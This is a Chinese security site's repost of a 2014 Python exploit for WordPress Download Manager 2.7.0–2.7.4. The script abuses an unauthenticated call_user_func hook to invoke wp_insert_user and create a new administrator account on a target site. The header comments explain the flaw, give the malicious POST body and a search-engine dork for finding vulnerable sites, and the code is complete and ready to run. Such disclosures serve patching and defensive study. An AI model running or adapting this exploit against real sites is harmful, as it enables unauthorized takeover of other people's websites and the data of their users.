首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-12-16  
#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03:  Discovered vulnerability
# 2014-12-04:  Patch released (2.7.5)
#
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#             echo "function not defined!";
#         die();
#     }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
   
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
   
# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
   
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
   
banner = """
    ___ ___               __
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
   |:      |    ______      |__|              __                __
   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
               |.  |    |_____|________|__|__|__|_____|___._|_____|
               |:  1    /   ___ ___
               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                           |. \_/  |___._|__|__|___._|___  |_____|__|
                           |:  |   |                 |_____|
                           |::.|:. |
                           `--- ---'
                                                   Wordpress Download Manager
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                          v2.7.0-2.7.4
   
                               Written by:
   
                             Claudio Viviani
   
                          http://www.homelab.it
   
                             info@homelab.it
                         homelabit@protonmail.ch
   
                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
"""
   
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
   
options, remainder = commandList.parse_args()
   
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
   
host = checkurl(options.target)
timeout = options.timeout
   
print(banner)
   
socket.setdefaulttimeout(timeout)
   
username = id_generator()
pwd = id_generator()
   
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})
   
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
   
print "[+] Tryng to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()
   
    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")
   
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tuleap PHP Unserialize Code Ex
·tnftp - clientside BSD Exploit
·WordPress WP Symposium 14.11 S
·ActualAnalyzer Cookie Command
·Advantech AdamView 4.30.003 -
·phpMyAdmin 4.0.x, 4.1.x, 4.2.x
·VFU 4.10-1.1 - Buffer Overflow
·HTCSyncManager 3.1.33.0 - Serv
·BulletProof FTP Client 2010 Bu
·Avira 14.0.7.342 - (avguard.ex
·Flat Calendar 1.1 HTML Injecti
·CodeMeter 4.50.906.503 - Servi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved